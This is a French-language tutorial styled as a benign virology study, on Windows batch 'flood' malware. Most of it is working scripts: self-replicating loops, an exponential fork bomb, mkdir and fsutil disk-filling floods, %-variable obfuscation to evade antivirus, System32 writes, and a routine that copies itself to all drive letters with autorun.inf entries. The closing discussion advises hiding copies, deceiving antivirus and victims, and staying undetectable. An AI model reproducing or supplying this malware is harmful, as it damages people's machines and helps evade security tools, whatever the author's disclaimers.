VIROLOGIE INFORMATIQUE Auteur : Samuel De Cruz VIROLOGIE INFORMATIQUE Etude : virus flood, noyage disque dur. Rédaction 15/10/2017. Samuel De Cruz (NEPRAM HACKER catégorie White Hat / étudiant psychologue et psychanalyste, diplômé en informatique et anglais et école supérieure.) Étude strictement bienveillante en matière de virologie informatique, pour la curiosité et l’intellectualisme. Usage non-hostile. Contact : samdec86@yahoo.fr

Dans ce document nous allons étudier les différents algorithmes de virus batch pour la menace Flood. Le « Flood », qui signifie « noyer » en anglais, est le sens figuré de l’attaque qui impose dans l’espace mémoire une quantité énorme d’éléments (fichiers, dossiers…). Le but d’une attaque flood étant de perturber, allant jusqu’à saturer un espace pour le ralentir ou le stopper. Nouvelles générations de Virus Bactériophages rassemblés sur la membrane plasmique d’une bactérie infectée (E-colli). On remarque dans le cytoplasme d’autres virus en cours de maturité. La quantité de virus va bientôt saturer l’environnement. Dans ce document, ce qui nous intéresse c’est l’analogie de la quantité ainsi que quelques suppléments uniques du monde informatique. En d’autres termes, nous allons voir comment un virus informatique peut faire de nombreuses copies de lui-même sans dépendre d’un host, comment effectuer une pollution massive, mais aussi, comment perturber l’espace d’un disque dur rapidement.

Type %~nx0 >> %random%.bat goto :Loop En virologie informatique nous ne sommes pas obliger de dépendre d’un host pour la multiplication virale. Exemple avec ce script ultra simple. Le virus.bat vient d’effectuer en 1 seconde 5 copies de lui-même. @echo off Type %~nx0 >> %random%.bat pause Nous pouvons donc utiliser ce type de d’auto-multiplication pour noyer un espace (et par le même effort, polluer), un ordinateur. Le script ci-dessous sera encore plus redoutable car sans fin… Nous utilisons là, la boucle Loop. @echo off :Loop Type %~nx0 >> %random%.bat goto :Loop

set ALPHA=XX%random%XXX Type %~nx0 >> %ALPHA%.bat Pour un effet encore plus redoutable et dévastateur, nous pouvons utiliser la progression de saturation par l’exponentiel. Dans ce cas, non seulement le virus va effectuer des copies de lui-même sans fin (jusqu’à le crash système), mais il va aussi lancer l’exécution des copies ! Se sera une saturation exponentielle. @echo off :loop set ALPHA=XX%random%XXX Type %~nx0 >> %ALPHA%.bat start %ALPHA%.bat goto :loop EXPONENTIELLE @echo off :Loop Type %~nx0 >> %random%.bat goto :Loop NON-EXPONENTIEL

Auto-multiplication rapide du virus « VIRUS.bat » / Samuel De Cruz Analogie Biologie Informatique : Multiplication. (bien que la machinerie permettant cette multiplication est différente dans ce cas d’exemple, la quantité massive du virus est identique.) Le virus Amaril Le virus Amaril ( cause la Fièvre Jaune) – virus en quantité massive, saturation de l’environnement de l’infection. Le virus « VIRUS.Bat », début de saturation dans son environnement : le dossier laboratoire. Auto-multiplication rapide du virus « VIRUS.bat » / Samuel De Cruz

@ec%SsdfsdfS%ho of%oezhfukjsdbhfdsf%f :flood La violence FLOOD n’est pas uniquement par copie du virus lui-même, nous pouvons aussi faire de la pollution massive. @echo off Mkdir %random% EXIT Redoutable et dévastateur : Plus avancé et protégé (on intègre dans l’algorithme des crypto par %%), ainsi l’Antivirus à plus de mal à trouver le virus : @echo off :Loop Mkdir %random% Goto :Loop @ec%SsdfsdfS%ho of%oezhfukjsdbhfdsf%f :flood mkd%oezhfkjsfsf%ir %random% PAUSE g%DSFCVXCV%oto :flood

echo >%random%.docx echo >%random%.ppt echo >%random%.pdf La violence FLOOD via multi-formats. Pas une violence Flood mais j’en profite pour en parler rapidement : la violence FARK BOMB : @echo off echo >%random%.mp3 echo >%random%.docx echo >%random%.ppt echo >%random%.pdf echo >%random%.jpg echo >%random%.mp4 @echo off :Loop start Goto :Loop @echo off :Loop Start Goto :Loop @echo off :Loop echo >%random%.mp3 echo >%random%.docx echo >%random%.ppt echo >%random%.pdf echo >%random%.jpg echo >%random%.mp4 Goto :Loop

fsutil file createnew alpha 50000000 pause Utilisation de la commande FSUTIL pour saturer l’espace. @echo off fsutil file createnew alpha 50000000 pause Utilisation de la commande FSUTIL pour saturer l’espace avec %random% et taille 50000000 Vous pouvez constater que le fichier fait bien env. 50 Mo, pourtant…il est vide. @echo off fsutil file createnew %random% 50000000 pause

Ce qui rend cette commande redoutable, c’est que l’on peut facilement et rapidement saturer un disque dur avec juste quelques fichiers, sans passer par un flood massif. Un exemple avec un fichier totalement vide, mais qui manifeste 488 Mo de taille ! Avec le fichier polluant réalisé Sans le fichier polluant réalisé

REM -------- CURRENT DIR FLOOD Se%XXXX%t DFSHGFHQSBGKGKBHS=fsutil Mélange de violence flood fsutil et mkdir. On y remarque la crypto par %% interne. Pollution de plusieurs Go. @echo off REM -------- CURRENT DIR FLOOD Se%XXXX%t DFSHGFHQSBGKGKBHS=fsutil %DFSHGFHQSBGKGKBHS% file c%XXXX%re%DQSDQSFQSFQ%atenew %random% 1000000000 Ec%XXXX%ho. M%OOO%kdir %random% %DFSHGFHQSBGKGKBHS% file c%XXXX%r%DQSDQSFQSFQ%eatenew %random% 1000000000 %DFSHGFHQSBGKGKBHS% file cr%XXXX%eatene%DQSDQSFQSFQ%w %random% 1000000000 Ech%XXXX%o. %DFSHGFHQSBGKGKBHS% file c%DQSDQSFQSFQ%reatenew %random% 1000000000 (…)

for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( Différents algorithmes pour la violence flood au-delà du disque. INFECTION copy %~nx0 A:\%random%.bat > NUL copy %~nx0 B:\%random%.bat > NUL copy %~nx0 C:\%random%.bat > NUL copy %~nx0 D:\%random%.bat > NUL copy %~nx0 E:\%random%.bat > NUL copy %~nx0 F:\%random%.bat > NUL copy %~nx0 G:\%random%.bat > NUL copy %~nx0 H:\%random%.bat > NUL copy %~nx0 I:\%random%.bat > NUL copy %~nx0 J:\%random%.bat > NUL copy %~nx0 K:\%random%.bat > NUL copy %~nx0 L:\%random%.bat > NUL copy %~nx0 M:\%random%.bat > NUL copy %~nx0 N:\%random%.bat > NUL copy %~nx0 O:\%random%.bat > NUL copy %~nx0 P:\%random%.bat > NUL copy %~nx0 Q:\%random%.bat > NUL copy %~nx0 R:\%random%.bat > NUL copy %~nx0 S:\%random%.bat > NUL copy %~nx0 T:\%random%.bat > NUL copy %~nx0 U:\%random%.bat > NUL copy %~nx0 V:\%random%.bat > NUL copy %~nx0 W:\%random%.bat > NUL copy %~nx0 X:\%random%.bat > NUL copy %~nx0 Y/\%random%.bat > NUL copy %~nx0 Z:\%random%.bat > NUL @echo off for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open="%%E:\%0" >> %%E:\autorun.inf echo action=Open folder to see files... >> %%E:\autorun.inf)

Différents algorithmes pour la violence flood au-delà du disque. @echo off echo %random% > "C:\Windows\System32\%random%" echo %random% > "C:\Windows\System32\%random%«  Exemple de pollution, de flood, et de copies multiples par les premiers test du virus «  NYPERIUS », un virus d’étude visible. @echo off echo %random% > "%userprofile%\Desktop\%random%" echo %random% > "%userprofile%\Desktop\%random%"

Exemple de violence par le virus « NYPERIUS » : le virus-maman fabrique des sous-virus (enfant-soldats) qui eux réalisent des pollutions et violences flood. Aussi, la crypto %% interne des sous-virus change, via un petit polymorphisme.

Discussion : La violence flood (et pollution) est extrêmement utile en virologie informatique. Elle permet de saturer l’espace de la victime, de perturber son environnement, elle apporte de l’inquiétude chez la cible. Il est intéressant aussi de combiner flood et copie du virus lui-même, pour augmenter sa survie, tout en songeant à cacher les copies. On peut aussi réaliser de fausses copies du virus pour tromper l’antivirus et la victime. Cependant, il faut comprendre que le flood est une violence basique, une attaque pauvre…elle n’est ni brillante ni complexe. Aussi, elle attire la conscience de la victime. Il faut, surtout, penser à rendre le virus indétectable, structurellement, mais aussi, comportementalement. Point important : Les commandes (fsutil, mkdir, start…) sont légales et passionnantes. C’est l’usage humain qui peut être malveillant. Il est rappelé que ce document est une étude bienveillante pour les informaticiens (curieux de comprendre la virologie pour mieux sécuriser l’environnement cyber), et pour les Hackers White Hat (curiosité et intellectualisme). Aucunement, ce document valorise l’usage nuisible. Il est recommandé d’avoir de très bonnes connaissances en informatique pour étudier pacifiquement la virologie, afin d’éviter les accidents. Merci pour votre attention Strictement pour étude bienveillante Auteur : Samuel De Cruz (samdec86@yahoo.fr)